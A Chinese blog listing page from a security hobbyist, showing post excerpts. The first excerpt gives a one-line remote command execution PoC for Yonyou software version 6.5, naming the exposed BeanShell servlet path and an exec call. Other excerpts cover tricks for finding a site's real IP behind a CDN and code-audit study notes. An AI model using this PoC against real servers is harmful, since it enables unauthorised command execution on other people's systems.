会员
周边
新闻
博问
闪存
众包
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
Tankcz
风止于秋水,我止于你
博客园
首页
新随笔
联系
订阅
管理
上一页
1
···
3
4
5
6
7
8
9
10
11
下一页
2021年6月6日
用友命令执行
摘要: 记一下用友的命令执行 Poc: http://ip:port/servlet/~ic/bsh.servlet.BshServlet 然后exec(“commend”) 影响版本 6.5
阅读全文
posted @ 2021-06-06 17:59 Tankcz
阅读(353)
评论(0)
推荐(0)
2021年6月5日
红队经历续
该文被密码保护。
阅读全文
posted @ 2021-06-05 00:03 Tankcz
阅读(0)
评论(0)
推荐(0)
2021年6月4日
一次红队护网经历
该文被密码保护。
阅读全文
posted @ 2021-06-04 21:54 Tankcz
阅读(0)
评论(0)
推荐(0)
2021年5月7日
查找网站真实ip
摘要: 我自己常用的方法 一个网站无CDN,批量ping所有响应ip都一样 有CDN,返回多个响应ip 方法1 ssl证书:https://censys.io/ipv4 2.国外访问 3.子域名有时候无CDN 4.搜索引擎 通过网站的ico图标查找 将ico图标链接直接复制到fofa搜索框可以转换图标has
阅读全文
posted @ 2021-05-07 23:18 Tankcz
阅读(360)
评论(0)
推荐(0)
2021年3月11日
代码审计学习笔记
摘要: 最近在看代码审计 企业级web代码安全架构这本书,在办公室发现的,看了一下作者,竟然是seay源码审计系统的作者,我是用的第一个代码审计工具就是这个,当然,也就使用过这一个,记下笔记,这本书是16年出版,和现在的php版本有些差别,自行查阅资料 普通注入 普通注入可以直接搜索操作数据库的一些关键字,
阅读全文
posted @ 2021-03-11 11:52 Tankcz
阅读(136)
评论(0)
推荐(0)
上一页
1
···
3
4
5
6
7
8
9
10
11
下一页
公告